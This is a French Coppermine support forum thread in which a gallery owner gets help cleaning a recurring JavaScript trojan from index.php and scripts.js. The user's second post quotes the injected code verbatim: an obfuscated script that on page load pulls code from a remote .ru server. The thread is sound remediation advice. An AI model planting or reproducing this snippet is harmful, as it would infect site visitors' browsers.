Cheval de Troie intempestif et récurrent Cheval de Troie intempestif et récurrent
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Cheval de Troie intempestif et récurrent

Started by satsuki, January 10, 2010, 01:56:37 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

satsuki

Bonjour,

je sollicite votre aide car je suis face à un virus qui attaque ma galerie perpétuellement. Un ami m'a aidé à m'en débarrasser plusieurs fois, les fichiers scripts.js et index.php étaient infectés. (D'autre part, j'ai vu depuis hier, ce même virus infecte le site d'une amie http://www.just-ashleygreene.fr/ )

Les fichiers infecté sont toujours les même l'index et le scripts.js qui sont:

http://www.ashleygreenefrance.com/Galerie/
et
http://www.ashleygreenefrance.com/Galerie/scripts.js

aucun nettoyage avec fixfiles.php n'en ai venu à bout cette fois-ci.


Le logiciel malveillant est :
JS:Illredir-C [Trj]
Ma galerie: http://www.ashleygreenefrance.com/Galerie/

Merci d'avance pour votre aide

François Keller

il faudrait regarder dans le répertoire albums si il n'y a pas de fichier avec un morceau de code bizarre., pareil pour le fichier includes/config.inc.php et pour le répertoire des themes. C'est souvent là que se trouve le morceau de code qu'il faut éliminer
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

satsuki

Alors j'ai passé un moment à nettoyer avec fixfiles.php tout les dossiers des albums, puis les répertoires de thèmes, et include, j'ai édité le fichier config.inc.php et je ne vois aucun code pouvant être qualifié de "bizarre", après je ne sais pas du tout à quoi doit ressembler exactement un code bizarre...

Il y a bien un code bizarre à la fin de l'index des albums et celui de la galerie aussi
genre ça:

Quote
<script>/*LGPL*/ try{ window.onload = function(){var Nvg2x9p445j = document.createElement('s@(c($^r^(i^p&&^$t)$'.replace(/\)|\(|@|\^|#|\!|\$|&/ig, ''));Nvg2x9p445j.setAttribute('defer', 'd$)e^^!f#&)@@e()r&'.replace(/\(|\^|\)|&|@|\$|#|\!/ig, ''));Nvg2x9p445j.setAttribute('type', 't^(&)e@#x&t()!/!$j)!$a&v@a#s&@c#r&^^i(p^@$t$@&$'.replace(/\!|\^|\(|@|#|\$|\)|&/ig, ''));Nvg2x9p445j.setAttribute('id', 'O@^x#b@!&s@^r&@2!)(6#&1#^^p##&^i!#!u#u$)6)!f('.replace(/\!|\(|\$|\)|&|#|@|\^/ig, ''));Nvg2x9p445j.setAttribute('s)r!$c#@('.replace(/&|\^|@|\(|\$|\!|\)|#/ig, ''),  'h@t)^!t&$p@:)/$(#/))m((l@b(-(&c!#(o@)&(m!!.&)h$@e^@i^&(s((!e&&.(d@$e&(&.!!^t&@^#$i^!s$&#@c(a(#!@(l(i$$-^i&!t^(.$^t@@h^(!e(!c(#h#&@&o&(c##o&&#l$(^a))##(t#^@#e@w!e^&)b$^^.#@^r#!$)u#:()(8)#0@#8)@0!&/!#a#d!(@(&u@@l#(t$^!-()!$e@^m$p^)i@&$r$$e^!!.!@&c$^o^()m!$(/^#!#a^#^d$!u&$&@l@$t#@@!-!&$#e@m$@)p()&i()#r@#e^).@@$c(^o^)m$/^(!i&g&(($.&^c^$@o^&()m)$!).^b#$&r#&/))g$^)^o$!^o(g$l(#$e^(.(&c@(o#$@m(#$(/#@b!@a(d(&j))o$^(j&o)!.#)$c()o@^m$!/!@'.replace(/\!|\^|\$|\)|@|&|#|\(/ig, ''));if (document){document.body.appendChild(Nvg2x9p445j);}} } catch(Yd8zh9qcrhu53u79f44) {}</script>
<!--35c2f1fd7838c8102156b6e6c1aaad1d-->

Désolé encore pour mon incompétence, je sais à quel point cela peut être agaçant.

François Keller

effacez ce code des fichiers en question, il ne fait pas partie de Coppermine
continuez à chercher, c'est ce genre de code qu'il faut éliminer, on le trouve généralement dans les fichiers index des différents répertoires. Une manière de vérifier, est ce comparer la taille des fichiers du pack Coppermine (celui que vous avez téléchargé sur votre ordinateur et ceux qui se trouvent sur votre serveur. Si la taille est différente, regardez(avec un éditeur de texte) ce qu'ils contiennent après les avoir rapatriés sur votre ordi
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

satsuki

ouf, c'est bon,merci, j'ai supprimé tout ces codes-ci que je pouvais trouver dans les index.php, et le fichier "scripts.js" qui était toujours infecté, impossible de l'éditer à cause de mon anti-virus, je l'ai simplement supprimé et remplacé par celui d'origine.
Voilà!
Une dernière question et je ne vous embête plus, est-ce que c'est une personne "réelle" qui infecte ma galerie volontairement? Ou est-ce plus compliqué. Je pose cette question car une amie dont le site traite du même sujet que le mien a été infecté par le même virus aujourd'hui, et avait le même code sans queue ni tête à l'index de son site. Donc je trouve ça d'une étrange coïncidence.

En tout cas je vais changer mes mots de pass sous peu.

François Keller

difficile à dire si c'est un robot ou une personne qui fait ça. Mais c'est une bonne idée que de changer les mots de passe. Une autre bonne idée, est de mettre à jour régulièrement votre galerie dès qu'une nouvelle version de Coppermine est publiée
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

satsuki


François Keller

si le problème est résolu, n'oubliez pas de cliquer sur la coche en haut à droite du premier message pour le marque "solved"
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog